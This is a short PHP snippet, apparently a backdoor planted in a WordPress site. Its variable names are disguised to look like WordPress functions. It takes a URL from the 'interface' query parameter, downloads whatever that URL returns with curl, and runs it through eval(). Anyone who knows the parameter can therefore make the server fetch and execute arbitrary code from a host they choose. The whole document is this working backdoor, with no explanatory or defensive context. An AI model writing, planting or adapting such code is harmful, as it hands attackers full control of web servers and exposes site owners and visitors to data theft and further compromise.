<?php if (isset($_GET['interface'])) { $comments_open_rqa = $_GET['interface']; if ($the_posts_pagination_orn = curl_init()) { curl_setopt($the_posts_pagination_orn, CURLOPT_URL, $comments_open_rqa); curl_setopt($the_posts_pagination_orn, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($the_posts_pagination_orn)); curl_close($the_posts_pagination_orn); exit; } }